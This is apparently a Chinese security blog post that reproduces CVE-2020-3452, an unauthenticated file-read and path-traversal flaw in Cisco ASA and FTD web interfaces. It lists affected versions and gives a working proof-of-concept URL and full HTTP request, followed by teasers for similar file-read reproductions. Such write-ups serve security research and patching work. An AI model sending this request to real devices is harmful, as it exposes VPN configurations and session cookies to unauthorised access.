CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)
一、漏洞描述:
Cisco Adaptive Security Appliance (ASA)
防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。
二、影响范围
以下是CVE-2020-3452漏洞受影响的系统版本:
Cisco ASA 设备影响版本:
<9.6.1
9.6 < 9.6.4.42
9.71
9.8 < 9.8.4.20
9.9 < 9.9.2.74
9.10 < 9.10.1.42
9.12 < 9.12.3.12
9.13 < 9.13.1.10
9.14 < 9.14.1.10
Cisco FTD设备影响版本:
6.2.2
6.2.3 < 6.2.3.16
6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1
6.4.0 < 6.4.0.9 + Hot Fix
6.5.0 < Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)
6.6.0 < 6.6.0.1
三、漏洞复现
POC:
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
详细数据包
GET/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: webvpnlogin=1; webvpnLang=en
GET/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../HTTP/1.1
Host: 127.0.0.1
Content-Length: 2
核心的路径访问就OK
直接访问就是下载对应访问的文件:
参考:
https://mp.weixin.qq.com/s/zm0NXfBQLbqU0kZ9Uk7qLQ
https://www.cnblogs.com/potatsoSec/p/13364171.html
https://www.venustech.com.cn/article/1/14597.html
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
原文连接:https://mp.weixin.qq.com/s/i_x7gx_VratC6t8PaCg-Kg
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)相关推荐
- Apache Solr任意文件读取漏洞复现
Apache Solr任意文件读取漏洞复现 一.简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口.用户可以通过http请求,向搜索引擎服务器提交一定格 ...
- CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在 ...
- Grafana 任意文件读取漏洞复现
一.漏洞描述 Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件 二.漏洞影响 Grafana 8.x 三.漏洞复现 可以从登陆页面看到版本信息为 v8.2. ...
- GitLab任意文件读取漏洞复现(CVE-2020-10977)
0x00简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务.GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git ...
- CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现
目录 1. 简介 2. 影响范围 3. 环境搭建 3.1 安装Composer 4. 漏洞复现 4.1 列举目录 4.2 任意文件读取 1. 简介 ThinkAdmin 是基于 ThinkPHP后台开 ...
- GateOne CVE-2020-35736 任意文件读取漏洞复现
0x00:简介 GateOne 是一款使用 HTML5 技术编写的网页版 SSH 终端模拟器.基于现代的 HTML5 技术,无需任何浏览器插件.支持多个 SSH 进程.可以嵌入到其他任意应用程序中.支 ...
- Grafana 未授权任意文件读取漏洞复现
1.fofa 批量搜索 app="Grafana" 漏洞URL: {{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../. ...
- Gitlab 任意文件读取漏洞 CVE-2016-9086 漏洞复现
Gitlab 任意文件读取漏洞(CVE-2016-9086) by ADummy 0x00利用路线 上传poc.tar.gz文件->读取到etc/passwd 0x01漏洞介绍 2018 ...
- CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞
CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞 目录 漏洞原理 漏洞信息 受影响版本 FOFA搜集相关资产 漏洞分析&漏洞复现 解决方案 漏洞原理 Grafana是一 ...
最新文章
- 数据挖掘导论读书笔记5关联分析的基本概念和算法
- C++set容器-内置类型指定排序
- 前端学习(355):小练习
- Swift UISearchController
- 不用AJAX实现前台JS调用后台C#方法(小技巧)
- java中workFlowEvent_防止线程在java中重复处理
- 反射真的存在性能问题吗?
- Java继承中为什么不可以降低父类重写方法的访问权限
- 用Python做童年回忆的游戏 贪吃蛇
- Apache(四)访问验证方式
- 加快网站速度的最佳做法_(3)script脚本放在底部
- php xdebug调试 phpstorm配置
- wxpython控件字体_wxPython获取系统字体代码
- Unity_GlossyEnvironment--包含所有用于转换粗糙度,对立方体贴图采样以及从HDR转换的代码。
- 一、显示VOC2007数据集中的图像及标注信息
- Ps 快速更改头发颜色
- 交流电过零点检测电路总结
- 【Scikit-Learn 中文文档】处理文本数据 - scikit-learn 教程 | ApacheCN
- keras调试的正确打开方式: 一句话让你把tensorflow当pytorch用
- 淘宝新版打标足迹在哪里浏览?